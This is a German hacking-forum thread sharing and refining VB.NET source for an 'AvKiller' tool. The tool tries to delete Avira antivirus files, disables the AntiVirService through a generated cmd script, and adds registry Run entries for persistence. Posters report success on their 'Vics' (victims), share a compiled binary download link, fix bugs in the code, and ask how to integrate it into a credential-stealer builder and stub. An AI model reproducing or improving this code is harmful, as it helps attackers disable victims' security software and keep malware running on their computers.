So habe grade mal was geschrieben.
Es sollte spätestens wenn das Opfer Adminrechte hat nach den Neustart klappen.


Imports System.IO ' wird für den streamwriter benötigt
Public Class Form1

Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load

'versucht die .dlls im avira ordner zu löschen
Try
IO.File.Delete(Environment.SpecialFolder.Programs & "\avira\antivir desktop\" & "\*.dll*")
Application.DoEvents()
Catch ex As Exception

End Try
Try
'Versucht den Ordner Avira zu löschen
IO.Directory.Delete(Environment.SpecialFolder.Prog rams & "\avira")
Application.DoEvents()
Catch ex As Exception

End Try
'erstellt ne cmd im ordner tmp um den Antirservice zu killen klappt aufjedenfall nach dem neustart des systems
Try
Dim swriter = New StreamWriter(Environ("tmp") & "\avira.cmd")
swriter.WriteLine("@echo off")
swriter.WriteLine("sc.exe config AntiVirService start= disabled")
swriter.Close()
'startet die avira.cmd
Process.Start(Environ("tmp") & "\avira.cm")
Catch ex As Exception

End Try
'macht einen registry eintrag für den autostart der avira.cmd
Try
Dim regpfad As String = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run"
Dim regname As String = "AVFuck"
Dim filepfad As String = Environ("tmp") & "\avira.cmd"

My.Computer.Registry.SetValue(regpfad, regname, filepfad, _
Microsoft.Win32.RegistryValueKind.String)
Catch ex As Exception
End Try
Try
'Löscht den eintrag für das trayicon von avira
My.Computer.Registry.SetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run", "avira", "", _
Microsoft.Win32.RegistryValueKind.String)
Catch ex As Exception

End Try
'schreibt einen registry autostart eintrag für die anwendung
Try
Dim regpfaddatei As String = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run"
Dim regnamedatei As String = "AVFuckstarter"
Dim filepfaddatei As String = Application.ExecutablePath

My.Computer.Registry.SetValue(regpfaddatei, regnamedatei, filepfaddatei, _
Microsoft.Win32.RegistryValueKind.String)
Catch ex As Exception

End Try
End
End Sub
End Class


was der Code macht steht dabei.

mfG

Ah.. thx. Sowas in der art hab ich gesucht :)

jo wenn das nun auch noch funzt =) dann DANKE XD

Also bei einem meiner Vics ist AV sofort beendet worden und der service war auch bein neustart immer noch zu.
das trayicon war weg joa.^^

und bei mir bei XP gings auch da war der servive jedoch erst nach dem neustart vollständig beenden wie das trayicon.

mfG

So wie ich das sehe geht das aber auch nur wenn man avira im standart ordner installiert hat.

Nein es geht auch in anderen Ordner da die avira.cmd eigentlich nur entscheident ist ;)

Das löschen würde nicht gehen aber Avira ist trotzdem down.

mfG

Kann das mal bitte einer compilieren udn uppen?

also ich find das teil geil!
funkzt auch unter vista wie ich es mir erhofft habe (durch´s lesen^^)
mfg

----------
edit :
nur das mit der registry kann ich bemängeln in vista =)
edit ende
---------

Compilieren &nd Uppen pls :[

Ich arbeite mit VB6 :p

Und hab auch nach sowas gesucht

@yazzn

1.ist es vb.net
2. der code steht da warum sollte ich es compilen und uppen ?
3.wenn du in vb6 codest dann wird dir der compilte code nichts bringen , wenn du daraus lernen willst ist der opensource besser.


mfG

@yazzn

1.ist es vb.net
2. der code steht da warum sollte ich es compilen und uppen ?
3.wenn du in vb6 codest dann wird dir der compilte code nichts bringen , wenn du daraus lernen willst ist der opensource besser.


mfG
zu 2.

Für Leute die kein Orginal Windows haben und vb nicht usen können

Ich habe grade keine Lust es zu uppen mache es vllt später , da ich eigentlich nur den Source reinstellen wollte.Kann ja einer machen wenn er bock hat.

Ja aber wenn man nur das Tool braucht und nicht coden kann, wärs ganz gut wenn du einfach shcnell die binary uppst^^

Download (http://rapidshare.com/files/254549092/AvKiller.exe)

Danke Darkfire ;)

Aber es klappt nicht immer wie ichs festgestellt habe.

Naja ;)

Try
Dim swriter = New StreamWriter(Environ("tmp") & "\avira.cmd")
swriter.WriteLine("@echo off")
swriter.WriteLine("sc.exe config AntiVirService start= disabled")
swriter.Close()
'startet die avira.cmd
Process.Start(Environ("tmp") & "\avira.cm")
Muss das aber nicht so aussehen?


Try
Dim swriter = New StreamWriter(Environ("tmp") & "\avira.cmd")
swriter.WriteLine("@echo off")
swriter.WriteLine("sc.exe config AntiVirService start= disabled")
swriter.Close()
'startet die avira.cmd
Process.Start(Environ("tmp") & "\avira.cmd")

Was mich auch wunder ist dieses Befehl um z.B. den Ordner von Aira zu finden

Code:

IO.Directory.Delete(Environment.SpecialFolder.Prog rams & "\avira")

Ich hab genau das gleiche in einem anderen Projekt von mir versuch
Nur ich wollte einen Ordner erstellen:


IO.Directory.CreateDirectory(Environment.SpecialFo lder.Programs & "\Ordnername")
ODER
Dim FSO As New Scripting.FileSystemObject
FSO.CreateFolder(Environment.SpecialFolder.Program s & "\Ordnername")
Bei beiden Methoden hat er nur einen Ordner im Debug Ordner mit dem namen
"2Ordnername" erstellt weil dieses Befehl nur einen Integer zurückgibt

Das mit dem Befehl Environ("tmp") hat funktioniert

Deswegen gleube ich das die Befehle mit dem löschen von avira gar nichts bringen, weil da der falsche ordner gesucht wird

nur der 2te teil mit der cmd und der registry ist am wichtigsten

Ich glaube Nec hat den Code auch shön korigiert
Den könnte inmate vlt noch ein seinem Code ändern

Und eine Frage die ich noch hab:

Kennt jemand weitere Parameter für den Befehl Environ() außer tmp?


mfg deus13

Kennt jemand weitere Parameter für den Befehl Environ() außer tmp?


Hab was für VBA gefunden, sollte aber auch mit .NET funtzen:
http://excelabc.de/excel/mt/makro.php?Seite=mt00007

mfg

Ja, des mit ProgramFiles funtkioniert
Das meiste sollte auch gehen
Vielen Dank

Hier nochmal der Code etwas korigiert:



Imports System.IO ' wird für den streamwriter benötigt
Public Class Form1

Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load

'versucht die .dlls im avira ordner zu löschen
Try
IO.File.Delete(Environ("ProgramFiles") & "\avira\antivir desktop\" & "\*.dll*")
Application.DoEvents()
Catch ex As Exception

End Try
Try
'Versucht den Ordner Avira zu löschen
IO.Directory.Delete(Environ("ProgramFiles") & "\avira")
Application.DoEvents()
Catch ex As Exception

End Try
'erstellt ne cmd im ordner tmp um den Antirservice zu killen klappt aufjedenfall nach dem neustart des systems
Try
Dim swriter = New StreamWriter(Environ("tmp") & "\avira.cmd")
swriter.WriteLine("@echo off")
swriter.WriteLine("sc.exe config AntiVirService start= disabled")
swriter.Close()
'startet die avira.cmd
Process.Start(Environ("tmp") & "\avira.cmd")
Catch ex As Exception

End Try
'macht einen registry eintrag für den autostart der avira.cmd
Try
Dim regpfad As String = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run"
Dim regname As String = "AVFuck"
Dim filepfad As String = Environ("tmp") & "\avira.cmd"

My.Computer.Registry.SetValue(regpfad, regname, filepfad, _
Microsoft.Win32.RegistryValueKind.String)
Catch ex As Exception
End Try
Try
'Löscht den eintrag für das trayicon von avira
My.Computer.Registry.SetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run", "avira", "", _
Microsoft.Win32.RegistryValueKind.String)
Catch ex As Exception

End Try
'schreibt einen registry autostart eintrag für die anwendung
Try
Dim regpfaddatei As String = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run"
Dim regnamedatei As String = "AVFuckstarter"
Dim filepfaddatei As String = Application.ExecutablePath

My.Computer.Registry.SetValue(regpfaddatei, regnamedatei, filepfaddatei, _
Microsoft.Win32.RegistryValueKind.String)
Catch ex As Exception

End Try
End
End Sub
End Class

Danke Darkfire ;)

Aber es klappt nicht immer wie ichs festgestellt habe.

Naja ;)


Soll ich das os in den builder ienbauen;

If Checkbox1.Checked Then
Dim USB As String
USB = "true"
End If

Stub:

If BuilderDaten(3) = "true" Then

Funktion heir ?!?!?!?!?

End If


Danke Inmate

If Checkbox1.Checked Then
Dim USB As String
USB = "true"
End If

Stub:

If BuilderDaten(3) = "true" Then

Funktion heir ?!?!?!?!?

End If


Warum "USB" und nicht "Aviradisable" ? Kommt drauf an an welcher Stelle du dann "USB" oder "Aviradisable an die Stub übergibst.Ja den code kannst du da einfügen.Schöner wäre es aber wenn du alles in ne Funktion packst und da nur die Funktion callst.Aber nungut :)

Warum "USB" und nicht "Aviradisable" ? Kommt drauf an an welcher Stelle du dann "USB" oder "Aviradisable an die Stub übergibst.Ja den code kannst du da einfügen.Schöner wäre es aber wenn du alles in ne Funktion packst und da nur die Funktion callst.Aber nungut :)



Jo, also ich habe deine USB Spread Funktion gesehen, aber leider klappt das auch nicht irgendwie mit AV, die Daten werden nicht an die Stub gehängt. Brauche da etwas Hilfe:

Stealer Builder:

If CheckBox4.Checked Then
Dim AviraKill As String
AviraKill = "True"

Stealer Stub:

If BuilderDaten(3) = "True" Then
Die Funktion hier!

Enf If

Problem: das geht hier nicht richtig bzw. gar nicht, würde mich freuen, wenn es jemand genauer erklären könnte, möchte das lernen, verstehen & umsetzen können.


Danke Inmate

Gruß

Slawa